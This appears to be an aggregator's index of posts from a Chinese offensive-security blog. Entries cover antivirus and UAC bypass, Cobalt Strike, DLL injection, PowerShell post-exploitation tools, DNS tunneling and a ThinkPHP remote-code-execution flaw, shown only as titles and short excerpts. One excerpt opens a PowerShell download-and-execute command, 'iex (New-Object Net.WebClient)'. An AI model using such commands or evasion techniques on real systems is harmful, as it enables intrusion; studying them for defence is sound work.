驱动人生供应链木马攻击2019.1.30变种木马分析 360安全大脑监测到通过”驱动人生”供应链攻击传播的挖矿木马在1月30日下午4时左右再次更新……0x00 事件背景360安全大脑监测到通过”驱动人生”供应链攻击传播... 2019-02-23 09:00:00 | 阅读: 107 | 收藏 | payloads.online rvn0xsy powershell 攻击 木马 wmiobject

Github搜索语法-信息搜集指南 您可以在所有公共GitHub存储库中搜索以下类型的信息，以及您有权访问的所有私有GitHub存储库： Repositories Topics Issues a... 2019-01-31 09:00:00 | 阅读: 170 | 收藏 | payloads.online cats 仓库 stars github php

Visual Studio 调试DLL Jan 26, 2019 首先这是DLL项目，找到调试选项：调用rundll32 来调试：这样就可以进行调试了。... 2019-01-26 09:00:00 | 阅读: 146 | 收藏 | payloads.online 安全 nmap 渗透 信息 swaks

Windows 2019 Bypass (UAC、Defender) to Metasploit 0x00 前言昨天下午在小密圈看到一篇文章：https://egre55.github.io/system-properties-uac-bypass/文中指出 Sy... 2019-01-26 09:00:00 | 阅读: 285 | 收藏 | payloads.online windows srrstr bypass 劫持

Cobalt Strike - Metasploit Bypass AV Jan 21, 2019 倾旋 安全从业者，爱好安全... 2019-01-21 09:00:00 | 阅读: 154 | 收藏 | payloads.online 安全 nmap 信息 渗透 就职

DLL Injection Example Project1.dll:#include <Windows.h>BOOL APIENTRY DllMain( HMODULE hModule,... 2019-01-20 09:00:00 | 阅读: 94 | 收藏 | payloads.online lpmemory lpdllname messagebox hthread

CobaltStrike - Easy Bypass AV(Demo) Jan 2, 2019 倾旋 安全从业者，爱好安全产... 2019-01-02 09:00:00 | 阅读: 122 | 收藏 | payloads.online 安全 nmap 信息 渗透 个子

Windows Error Code 0 操作成功完成。 1 功能错误。 2 系统找不到指定的文件。 3 系统找不到指定的路径。 4 系统无法打开文件。 5 拒绝访问。 6 句柄无效。 7 存储控制... 2019-01-01 09:00:00 | 阅读: 84 | 收藏 | payloads.online 数据 网络 控制 ncb 群集

2018 - 挥手告别 2017是我蜕变最大的一年，工作辞了、准备创业、创业失败，最终写了一篇文章，与创业这条路挥手告别。文章部分内容如下：《关于一叶知安团队，我有些事情要对读者交代》... 2018-12-31 09:00:00 | 阅读: 203 | 收藏 | payloads.online 安全 渗透 创业 一叶 自信

Windows - 内存管理 0x00 Windows Heap每个线程都有自己的堆栈，堆用于在内存中存储未知大小的数据，由堆管理器管理，而栈用于保存函数执行状态，存储局部变量。0x01 申请堆空... 2018-12-21 09:00:00 | 阅读: 131 | 收藏 | payloads.online windows lpvirmem heapalloc

最近学习Windows编程总结 0x00 Windows 字符编码目前Windows最常见的字符集： 1.ASCII 2.Unicode 3.UTF-16 4.UTF-8Uni... 2018-12-20 09:00:00 | 阅读: 126 | 收藏 | payloads.online drives hvolume windows

Windows - 线程同步 0x00 线程基础每个线程的堆栈空间不同，在多线程执行时，可以互不干扰的运行，但是全局变量保存在全局区，当多个线程读写全局变量时，由于读写操作不是原子的，会发生程序错乱... 2018-12-20 09:00:00 | 阅读: 104 | 收藏 | payloads.online wcout 临界 互斥 hthread createmutex

Windows 文件映射 0x00 文件映射的原理文件映射(Mapping)是一种能够将文件内容映射到进程的虚拟地址空间的技术。视图(view)是一个由映射句柄开辟的一块虚拟地址空间，用于存放文... 2018-12-20 09:00:00 | 阅读: 126 | 收藏 | payloads.online 映射 hfile hmap createfile

Intranet Space - nishang #ReadTeam/Powershell/Penetration-testing# 0x00 Powershell ExecutionPolicy（执行策略）设置执行策略(Set-ExecutionPolicy)Powershell默认的权限策略是：... 2018-12-19 09:00:00 | 阅读: 105 | 收藏 | payloads.online powershell nishang windows reverse

Intranet Space - Linux Privilege 0x00 LinEnumScripted Local Linux Enumeration & Privilege Escalation ChecksGithub:ht... 2018-12-19 09:00:00 | 阅读: 134 | 收藏 | payloads.online github linenum suggester machine rebootuser

Intranet Space - powershell bypass av Dec 18, 2018 0x00 DownloadStringpowershell iex (New-Object Net.WebClient)... 2018-12-18 09:00:00 | 阅读: 134 | 收藏 | payloads.online powershell bruteforce n8l3m6fi

Intranet Space - p0wnedShell 0x00 p0wnedShellp0wnedShell is an offensive PowerShell Runspace Post Exploitation hos... 2018-12-18 09:00:00 | 阅读: 127 | 收藏 | payloads.online powersploit nishang powershell p0wnedshell windows

Intranet Space - Dns Tunneling 0x00 DNS隧道简介DNS Tunneling，是隐蔽信道的一种，通过将其他协议的数据封装在DNS协议中传输建立通信。普通的 DNS 查询过程如下:客户端发送... 2018-12-18 09:00:00 | 阅读: 112 | 收藏 | payloads.online 隧道 dnscat2 nslookup 木马 加密

Intranet Space - Empire 0x00 简介Empire is a PowerShell and Python post-exploitation agent.http://www.power... 2018-12-18 09:00:00 | 阅读: 154 | 收藏 | payloads.online situational network privesc mimikatz powerview

Thinkphp 5.x # 5.1.31, #= 5.0.23 Remote code Execute 0x00 漏洞背景近日thinkphp团队发布了版本更新https://blog.thinkphp.cn/869075，其中修复了一处getshell漏洞。 影响... 2018-12-05 09:00:00 | 阅读: 136 | 收藏 | payloads.online pocsuite thinkphp 漏洞 proxies 远程